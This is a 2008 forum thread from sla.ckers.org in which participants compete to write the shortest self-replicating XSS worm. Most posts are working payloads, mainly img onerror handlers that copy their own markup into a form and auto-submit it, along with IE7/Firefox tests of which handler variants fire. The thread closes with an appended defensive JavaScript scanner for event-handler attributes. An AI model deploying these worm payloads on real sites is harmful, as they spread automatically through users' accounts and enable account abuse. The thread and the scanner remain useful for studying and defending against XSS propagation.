Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 04:18PM

blahblah, which browser is that? i got that error before, but i thought i fixed it.

also, no, the browser will navigate to post.php; if you want that happening in the background you need to do tricks with iframes, which adds a whole bunch of bytes.
i suppose we're looking at a very bare-bones worm here.

Re: Diminutive XSS Worm Replication Contest
Posted by: BlahBlah
Date: January 04, 2008 04:20PM

Firefox, v2.0.0.11

Edit: Happens in IE7 as well.



Edited 1 time(s). Last edit at 01/04/2008 04:24PM by BlahBlah.

Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 04, 2008 04:21PM

@.mario - If you just wrap your form in a <p> ... </p> tag everything works and you don't have to worry about outerHTML in FF2. It would bring your total up to 171, including the missing alert, which is still the leading submission that I have seen.

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 04:24PM

heh, blahblah i accidentally replicated your bug ;-) you need to remove the newline in my code before inserting. otherwise the firstSibling property is the "\n" textNode.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 04, 2008 04:25PM

@Matt: Thx - nice! I am just trying another approach but yet w/o success *g*

Re: Diminutive XSS Worm Replication Contest
Posted by: BlahBlah
Date: January 04, 2008 04:25PM

Ah, it works now, in FF and IE.

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 04, 2008 04:28PM

As a side note, in looking at some of the examples, I just realized that this actually fires in Firefox (Not IE though, sorry)... Firefox apparently doesn't require the following information in the src attribute:

<img src onerror="alert('XSS')">

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 04:28PM

Matt Presson Wrote:
-------------------------------------------------------
> @.mario - If you just wrap your form in a <p> </p>
> tag everything works and you don't have to worry
> about outerHTML in FF2. It would bring your total
> up to 171, including the missing alert, which is
> still the leading submission that I have seen.

Matt, it wouldn't work that easily, because you'd also need to add the <p> tags around the code again, otherwise it won't get replicated in the next generation.
and that would require you to use the quotes again around the onerror handler, because otherwise you can't have the ">" character in your code ..

would *at least* add another 10 bytes, going to 181 .. but i'd rather see it than just count it roughly ;-)

i wanna see a working example otherwise i think barbarianbob's on top :-P

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 04:32PM

so, rsnake, since you appear to be the only one willing to fire up IE7 ;-) what is the shortest way to fire an onerror event in an IMG tag?

in other words, which works in IE7:

<img src="/" onerror
<img src="." onerror
<img src=. onerror
<img src=/ onerror
<img src= onerror
<img src onerror

?

Re: Diminutive XSS Worm Replication Contest
Posted by: thornmaker
Date: January 04, 2008 04:37PM

<img src=. onerror=[whatever]>
fires in IE7. you can use other things in place of the . too. I couldn't find any shorter ones with IE7

Re: Diminutive XSS Worm Replication Contest
Posted by: BlahBlah
Date: January 04, 2008 04:37PM

<img src=. and <img src=/ work.

barbarianbob's code doesn't appear to work in IE. "n.content is null or not an object"

I'm probably just doing something wrong again ¬_¬



Edited 1 time(s). Last edit at 01/04/2008 04:40PM by BlahBlah.

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 04, 2008 04:42PM

In IE7.0:

<img src="/" onerror=alert(1)> works
<img src="." onerror=alert(2)> works
<img src=. onerror=alert(3)> works
<img src=/ onerror=alert(4)> works
<img src= onerror=alert(5)> does not work
<img src onerror=alert(6)> does not work

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: arantius
Date: January 04, 2008 04:46PM

Tested in FF2 and IE7 (and IE6).

<p><form method=post action=post.php><input name=content>
<script>
alert('XSS');
F=document.forms;f=F[F.length-1];
f.content.value='<p>'+f.parentNode.innerHTML;
f.submit();
</script>

Squeezed into 176 bytes, plus newlines above for readability.

Must be used somewhere inside a valid HTML document, and post.php must be as well. And I'm kinda digging into the DOM. But, the reference is going to be valid regardless of the rest of the page (it's an inline script, so the last member of document.forms will always be this form).

If I understand the real problem space, " action=post.php" could probably be removed, to drop to 160 bytes.

Did I cheat, or is this OK?

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 04:49PM

well, if barbarianbob's also doesn't work, i guess i'm still in the lead ;-)

my guess would be that IE7 doesn't support accessing form elements through their "name" attribute as properties of the form object.

trying to fix it leaves me with this 191-byte version:
<s><img src=. onerror="alert('xss');f=this.nextSibling;f.firstChild.value='<s>'+this.parentNode.innerHTML+'</s>';f.submit()">
<form method=post action=post.php><input name=content></form></s>

it should work in IE7, but i can't test.

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 04, 2008 04:50PM

@arantius: who says the form you insert is the last one? (knowledge of the DOM page...)

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 04, 2008 04:50PM

<b><img src=. onerror=alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form></b>
174 bytes (not sure if it's already old)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Diminutive XSS Worm Replication Contest
Posted by: arantius
Date: January 04, 2008 04:56PM

@bwb labs:

The page is currently loading, when this script is executing. There is no DOM representing the bytes after this </script> tag, yet.

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 04:56PM

"action=post.php" can only be removed if the page where the injection *appears* is always post.php.
in a real social network setting, the post-url will probably be addComment.php or something, while the comment itself will appear on userProfile.php .

further, what if the injected code appears somewhere *before* another form in the HTML? say the "add your comment" form at the bottom of the comments list. wouldn't you then need to type F[F.length-2] ?
in other words, i think your entry presumes knowledge about the DOM. though correct me if i'm wrong.
-- i stand corrected.

using the auto-closing feature of the p-tag is a nice trick! but, i see another problem with that, what if the injected code is immediately followed by "comment submitted by <i>arantius</i>" as this would also be included in the innerHTML of the p-tag, right? cause the p only auto-closes when it meets a block-level HTML element, IIRC.

and ma1 .. WOW, nice idea of using the with keyword! damn, that's what i meant about having learned to program readable .. using with in any kind of production code is a definite no-no, and i totally forgot about that keyword ;-)



Edited 1 time(s). Last edit at 01/04/2008 04:58PM by ritz.

Re: Diminutive XSS Worm Replication Contest
Posted by: arantius
Date: January 04, 2008 04:58PM

Bah. I'm buggy in FF.

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 04, 2008 04:59PM

Another rip-off:
<b><img onerror="alert('xss');n=(m=this.parentNode).lastChild;n[0].value='<b>'+m.innerHTML+'</b>';n.submit()" src=""><form action="post.php" method="post"><input name="content"></form></b>
Note that the additional quotes are used because FF adds them otherwise and the script won't replicate identically* (also changed the order of onerror/src & action/method for IE).

188 bytes

* except for case sensitivity, due to how FF/IE handle tagNames in innerHTML
Tested on FF 2.0.0.11 & IE 7.0.5730.11

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 05:02PM

and wow^2, i just noticed the bold() trick .. that's pretty awesome.

Re: Diminutive XSS Worm Replication Contest
Posted by: arantius
Date: January 04, 2008 05:02PM

@ritz:

Ah! That auto-closing-p-tag might actually be my bug ... indeed it is. Changing <p> to <div> fixes, but bumps up to 180 bytes =(

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 04, 2008 05:03PM

@arantius - also make sure you don't use the knowledge of the DOM, per the rules. No forms[1] or anything like that.

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 04, 2008 05:04PM

<b><form method=post action=post.php><img src=. onerror=alert('xss');with(this.parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form></b>
173 bytes

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 04, 2008 05:07PM

And another really dirty but short ripoff - great one ma1 but nowadays browsers are so good to us lazy developers ;) 166

<b<img src=m onerror=alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form</b

Re: Diminutive XSS Worm Replication Contest
Posted by: arantius
Date: January 04, 2008 05:09PM

Well, I've been beaten, but thinking again, I'm not using special knowledge of the DOM outside that which I myself created, so I think my usage was fine. Sure, I reference document.forms, but only to get a handle to the form I injected myself. I'm not assuming any given structure but my own.

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 05:11PM

181 bytes, excluding the linebreak

<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()">
<form method=post action=post.php><input name=content></form></b>

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 04, 2008 05:11PM

identical replicate rip-off (code from ma1):
<b><form action="post.php" method="post"><img onerror="alert('xss');with(this.parentNode)[0].value=parentNode.innerHTML.bold(),submit()" src=""><input name="content"></form></b>

177 bytes identical replicate
cannot do [0] now ..

@ma1
tested your code (no [0] ;-) ) on my IE 7 and it fails.



Edited 3 time(s). Last edit at 01/04/2008 05:33PM by bwb labs.

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 05:16PM

arantius Wrote:
-------------------------------------------------------
> Well, I've been beaten but thinking again; I'm not
> using special knowledge of the DOM, outside that
> which I myself created, so I think my usage was
> fine. Sure, I reference document.forms; but only
> to get a handle to the form I injected myself.
> I'm not assuming any given structure but my own.

i agree with that arantius, i didn't immediately realize the inline script would hold the creation of the DOM tree. indeed a nice trick :)

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 04, 2008 05:18PM

@rsnake
> 2) must self replicate the entire payload

If you use innerHTML you get 'fixed' HTML in FF (so <input name=content> becomes <input name="content">), so which length counts? (see my 'identical replicate' moaning) ... also IE changes the order of some arguments (although not in my versions, since I edited it to IE's 'preferred' order) and capitalizes tagNames...

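As an added example (not code from any post in this thread), here is the defender's counterpart to three things the thread turns up: rsnake's IE7 table showing that onerror fires with src of ".", "/" or (in Firefox) no value at all, the unclosed-tag variant in the 166-byte entry, and bwb labs' point that innerHTML hands back "fixed" markup (quotes added, tag names upper-cased, attributes reordered). It is a small tolerant tag scanner in JavaScript that a content filter or a replication detector could use; the function names, the sample strings and the three renderings of the form are assumptions constructed for this example, not quotes of any entry.

```javascript
// Added example, not code from the thread. A tolerant tag/attribute scanner
// for submitted HTML, used two ways: to flag on* event-handler attributes no
// matter how the tag is mangled, and to canonicalise markup so that browser
// re-serialisation differences do not defeat a comparison against a known
// payload. All sample inputs below are constructed for this example.

const WS = /\s/;

// Scan every start and end tag in an HTML fragment. Each entry records the
// lower-cased tag name, its attributes as [name, value-or-null] pairs, and the
// [start, end) span in the input. A tag ends at an unquoted '>' or, when the
// author omitted it (as in <b<img ...>), at the next '<'.
function scanTags(html) {
  const tags = [];
  const re = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    const tag = { name: m[2].toLowerCase(), closing: m[1] === '/', attrs: [], start: m.index, end: 0 };
    let i = m.index + m[0].length;
    for (;;) {
      while (i < html.length && WS.test(html[i])) i++;
      if (i >= html.length || html[i] === '<') break;   // unterminated tag
      if (html[i] === '>') { i++; break; }
      if (html[i] === '/') { i++; continue; }
      let j = i;
      while (j < html.length && !WS.test(html[j]) && !'=<>'.includes(html[j])) j++;
      const name = html.slice(i, j).toLowerCase();
      i = j;
      while (i < html.length && WS.test(html[i])) i++;
      let value = null;                                 // valueless attribute, e.g. <img src onerror=...>
      if (html[i] === '=') {
        i++;
        while (i < html.length && WS.test(html[i])) i++;
        const q = html[i];
        if (q === '"' || q === "'") {
          const close = html.indexOf(q, i + 1);
          const stop = close === -1 ? html.length : close;
          value = html.slice(i + 1, stop);
          i = Math.min(stop + 1, html.length);
        } else {
          j = i;
          while (j < html.length && !WS.test(html[j]) && html[j] !== '>') j++;
          value = html.slice(i, j);
          i = j;
        }
      }
      if (name) tag.attrs.push([name, value]);
    }
    tag.end = i;
    re.lastIndex = i;
    tags.push(tag);
  }
  return tags;
}

// Report every on* attribute as "tag@attr", whatever the src value is and
// whether or not the tag was closed. Keying a filter on the src value is the
// wrong test: the thread shows onerror firing with src of ".", "/" or nothing.
function findEventHandlers(html) {
  const hits = [];
  for (const t of scanTags(html)) {
    for (const [name] of t.attrs) {
      if (name.startsWith('on')) hits.push(`${t.name}@${name}`);
    }
  }
  return hits;
}

// Rewrite each tag in one fixed form: lower-case names, attributes sorted by
// name, every value double-quoted, every tag closed. This absorbs the
// innerHTML re-serialisation differences described in the thread, so a
// byte-for-byte comparison still matches after a generation of replication.
function canonicalize(html) {
  let out = '';
  let last = 0;
  for (const t of scanTags(html)) {
    out += html.slice(last, t.start);
    const attrs = t.attrs
      .slice()
      .sort((a, b) => a[0].localeCompare(b[0]))
      .map(([k, v]) => (v === null ? k : `${k}="${v.replace(/"/g, '&quot;')}"`));
    out += `<${t.closing ? '/' : ''}${[t.name, ...attrs].join(' ')}>`;
    last = t.end;
  }
  return out + html.slice(last);
}

function sameMarkup(a, b) {
  return canonicalize(a) === canonicalize(b);
}

// Constructed samples modelled on the tag shapes discussed in the thread.
const SAMPLES = {
  firefoxValueless: '<img src onerror="alert(\'XSS\')">',
  ie7DotSrc: '<img src=. onerror=alert(3)>',
  unclosedTags: '<b<img src=m onerror=alert(1)><form method=post action=post.php><input name=content></form</b',
  benign: '<b>hello</b><img src="/pic.png" alt="a picture">',
};

// One form as typed, and as Firefox 2 and IE7 would hand it back through
// innerHTML according to the thread (constructed renderings).
const TYPED = '<b><form method=post action=post.php><input name=content></form></b>';
const FIREFOX = '<b><form method="post" action="post.php"><input name="content"></form></b>';
const IE7 = '<B><FORM action="post.php" method="post"><INPUT name="content"></FORM></B>';

if (typeof require !== 'undefined' && require.main === module) {
  for (const [label, html] of Object.entries(SAMPLES)) {
    console.log(label.padEnd(16), findEventHandlers(html));
  }
  console.log('typed == firefox:', sameMarkup(TYPED, FIREFOX));
  console.log('typed == ie7:    ', sameMarkup(TYPED, IE7));
}
```

The scanner deliberately does not try to be a full HTML parser; it only needs to be at least as forgiving as the browsers are about missing values, quotes and closing brackets, which is why a filter built on a regex for well-formed `<img src="..." onerror=...>` tags misses the variants in this thread while this one reports all of them.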